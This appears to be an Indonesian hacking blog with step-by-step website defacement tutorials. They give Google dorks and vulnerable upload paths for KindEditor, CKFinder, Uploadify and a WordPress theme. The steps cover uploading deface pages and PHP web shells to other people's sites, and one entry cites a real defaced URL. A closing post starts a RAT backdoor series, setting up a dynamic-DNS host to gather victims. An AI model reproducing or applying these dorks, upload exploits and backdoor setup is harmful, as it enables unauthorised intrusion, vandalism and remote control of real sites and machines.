Jumat, 14 Juli 2017

Cara deface dengan KindEditor

Gambar terkait
Sekainik- Hai sahabat sekainik apakabar kalian semua - baik dong pastinya - hari ini hari yang ditunggu mungkin yah , malsab :v , nah kali ini kita akan bahas tentang metode deface dengan KindEditor jadi apa itu  KindEditor , jadi disini kita akan melakukan upload pada sebuah site sama seperti upload upload lain , namanya juga Kindeditor
nah bahasan kita kali ini tentang vulnerability site langsung cek kebawah baca sepuasnya

Gambar terkait

Cara Deface dengan Kindeditor

1. Masukan Dorknya ke kotak pencarian Google :

inurl:examples/uploadbutton.html
inurl:kindeditor

2. Pilih salah satu site yang ingin di deface

3. tambahkan exploit :


Contoh : /Kindeditor/examples/uploadbutton.html

             http://site.com/exploit

             site.com/Kindeditor/examples/uploadbutton.html

Lalu akan muncul seperti screenshot

4. Klik upload >> pilih Script deface agan dengan format (.html)

5. tunggu sampai keluar URL hasil upload-an HTML kita


6. Copas link tersebut dan letakkan diakhir URL

Contoh : site.com/link


Demikian artikel ini dibuat dan tetap kunjungi blog kami yah tentang hal terbaru lainnya.




Deface Tutorial

Cara Deface dengan CKFinder

Gambar terkait



Sekainik- Hai sahabat sekainik apakabar kalian semua - baik dong pastinya - hari ini hari yang ditunggu mungkin yah , malsab :v , nah kali ini kita akan bahas tentang metode deface dengan CKFinder jadi apa itu CKFinder, jadi disini kita akan melakukan upload pada sebuah site sama seperti upload upload lain , namanya juga CKFinder
nah bahasan kita kali ini tentang vulnerability wordpress langsung cek kebawah baca sepuasnya

Hasil gambar untuk Cara Deface dengan CKFinder
Cara Deface dengan CKFinder

1. Masukkan Dork ini ke pencaharian google

dork : inurl:ckfinder intext:"ckfinder.html" intitle:"Index of /ckfinder"

          inurl:CKfinder/ckfinder.html

2. Pilih salah satu site untuk di deface, screenshotnya

3. Klik Choose file >> pilih script deface agan dengan format (.txt) lalu klik Upload Selected File

4.  Klik Kanan pada file agan lalu klik view

Nanti akan muncul link deface agan
Hasil dari saya
http://www.caxita.com/Caxita_NewDesign/application/views/adminpanel/includes/ckfinder/userfiles/files/hrs.txt



Demikian artikel ini dibuat dan tetap kunjungi blog kami yah tentang hal terbaru lainnya.

Deface Tutorial

Cara Deface dengan Metode Remote Shell


 Sekainik- Hai sahabat sekainik salam sejahter ya,  hari ini hari yang indah untuk coding , malsab :v , nah kali ini kita akan bahas tentang metode deface dengan remote shell upload jadi apa itu remote shell upload , jadi disini kita akan melakukan uploadify pada sebuah site namun dengan xamp , namanya juga remote shell upload

nah bahasan kita kali ini tentang vulnerability wordpress langsung cek kebawah baca sepuasnya

Hasil gambar untuk deface

Cara Deface Dengan Remote Shell Upload Vulnerability Uploadify
Cara Deface dengan Remote Shell Upload Vulnerability Uploadify wordpress

Bahan-bahan :

1. Script Uploadify.php | Download

biasanya taruh di shell sobat

2. Xampp | Download

jika ingin memakai xampp

3. Curl | Download

Langkah2 :

Dork:    inurl:/js/uploadify/

inurl:/admin/uploadify/

inurl:/includes/uploadify/

Pertama sobat Install Xampp nya, lalu kalo udah selesai, extrack file Curl, script uploadify.php, Shell.php dan letakkan di C:\xampp\php

Hasil gambar untuk Cara deface dengan metode remote shell upload Cara deface dengan metode remote shell upload

Sobat bisa juga upload script uploadify sobat via shell, taruh dimana saja asal di shell jangan taruh ditaruh di rumah nanti disangka apa lagi.

Jangan lupa edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tandah seperti Link target, nama file dan folder! Lalu Save kembali..

sdf

Selanjutnya buka Xampp, lalu klik Start Apache


Setelah itu buka Terminal, lalu masuk ke directories C:\xampp\php>

Lalu ketik perintah php uploadify.php dan tunggu aja hasilnya.

Disini saya akan menjabarkan yang lebih mudah melalui shell,

Caranya, tinggal panggil script yang sobat upload tadi misal : http://www.example.com/shellyangsudahditaruhscriptuploadify.php

Akan kelihatan deh nanti hasilnya,

sdf

Sekarang tinggal sobat mau apakan webnya terserah sobat.. btw itu baru dapet fresh target sob..hehehe
Deface Tutorial

Cara Deface dengan Exploit WP Themes

Hai kawan sekainik kali ini kita akan membahas tentang metode deface meski ini metode masih culun tapi metode ini ampuh loh , nah apa nama metode ini metode ini dinamakan exploit wp themes , lalu caranya ? , simak aja deh daripada pusing.
Hasil gambar untuk deface





    Dork : inurl:wp-content/salespresspro
    Exploit : /wp-content/themes/salespresspro/headerimgbgblog-upload.php

1. Silahkan cari target dulu ke google, lalu buka salah satu website dan ubah urlnya jadi seperti ini :

     www.bimo-notes.org/wp-content/themes/salespresspro/headerimgbgblog-upload.php

Hasil gambar untuk Cara Deface dengan Exploit WP Themes Cara Deface dengan Exploit WP Theme



2. Silahkan upload langsung shell kalian ( Browse -> shell.php -> upload file )


3. Setelah itu, nanti dibagian "Your Uploaded Images" muncul gambar rusak, silahan open new tab / copy link gambar rusak tersebut lalu buka.


Nah setelah berhasil upload shell, sekarng terserah mau diapain.
Kalau mau ditebas Indexnya silahkan back up dolo ya bro :) Untuk simple patchnya silahkan rename fileheaderimgbgblog-upload.php menjadi headerimgbgblog-upload.txt.

Demikian artikel ini dibuat kawan , semoga berguna bagi kita semua yah. dan gunakan dengan baik.
Deface Tutorial

Minggu, 18 Juni 2017

Membuat backdoor mudah dengan RAT


Hasil gambar untuk rat backdoor

Sekainik - Hai kawan sekainik kali ini kita akan membahas rat. Jadi apa itu rat ? rat adalah bla bla bla :v , dari agak kurang dimengerti langsung simak saja dibawah


Setahunnya blog Newbie Defacer dimana dulunya gw memperjualbelikan tutorial ini maksudnya gw perjualbelikan gw langsung yang akan mengajarinya dengan kemampuan gw tentunya menggunakan Team Viewer. Untuk sekarang gw bagikan secara Free.  Gw juga banyak belajar dari Muhammad Asril, ada yang kenal ? mungkin untuk pemula maupun yang sudah berkembang dibidang RAT ini sudah mengenal M. Asril, yups dia adalah seorang pengembang RAT terutama untuk Indonesia, sangat banyak tutorial yang diberikan diYoutube secara gratis yang diperjual cuma Toolsnya saja dan itu hasil karyanya sendiri.

Disini sama dengan halnya M. Asril gw juga membagikan tutorial bedanya gw akan membagikan secara bertahap dan teratur (menurut gw sih :V) supaya agan yang pemula mengerti dan paham RAT itu sendiri. Langsung saja



Tutorialnya gw membagikan Video bukan Tulisan karena akan sangat panjang. Di #Part I ini judulnya "Cara Membuat Akun Duc No-ip" Ini sangat penting untuk penggunaan RAT karena disanalah tempat berkumpulnya/tampungan untuk target/korban. Pada tahap pertama ya harus membuat akun Duc No-ip.

Register Duc No-ip
Download: Duc No-ip

Divideo gw membuat akun tersebut menggunakan fake email karena cuma untuk tutorial kalo agan harus menggunakan Email yg official yang terpercaya misal Gmail, Yahoo, Hotmail dll. jika akun Duc ip agan tidak dibuka-buka selama 1 bulan maka akun tersebut akan dihapus oleh pihak Duc Ip sendiri dan host yang telah dibuat juga akan ikut terhapus.

Kalo sudah terhapus gpp karena bisa didaftarkan dengan email yang telah dihapus oleh pihak Duc dan membuat host yang sama, itu terjadi karena akun agan tidak di upgrate menjadi Premium.
Backdoor Hack
Langganan: Postingan (Atom)

 

We are featured contributor on entrepreneurship for many trusted business sites:

    • Copyright © Sekainik™ is a registered trademark.
    Designed by Templateism. Hosted on Blogger Templates.